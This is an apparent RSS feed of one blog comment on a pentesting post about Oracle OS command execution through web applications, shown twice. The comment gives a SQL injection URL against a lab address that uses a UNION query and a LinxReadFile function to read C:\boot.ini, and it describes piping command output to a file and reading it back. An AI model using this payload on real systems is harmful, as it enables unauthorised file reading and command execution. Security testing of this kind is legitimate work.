Comments on: Oracle O.S command execution through web apps

Comments on: Oracle O.S command execution through web apps http://www.notsosecure.com/folder2/2009/04/27/oracle-os-command-execution-through-web-apps/ From Pentesters To Pentesters Thu, 08 Jul 2010 02:17:27 +0100 http://wordpress.org/?v=2.8.4 hourly 1 By: sid http://www.notsosecure.com/folder2/2009/04/27/oracle-os-command-execution-through-web-apps/comment-page-1/#comment-84532 sid Mon, 27 Apr 2009 14:27:27 +0000 http://www.notsosecure.com/folder2/?p=211#comment-84532 the text file also contains function to read files and you can get the output through UNION query as: http://192.168.172.129:81/ora2.php?name=1%20union%20all%20select%20sys.LinxReadFile('C:\boot.ini')%20from%20dual So, execute command, pipe the output to a file and read it back via union. the text file also contains function to read files and you can get the output through UNION query as:

http://192.168.172.129:81/ora2.php?name=1%20union%20all%20select%20sys.LinxReadFile(‘C:\boot.ini’)%20from%20dual

So, execute command, pipe the output to a file and read it back via union.

]]>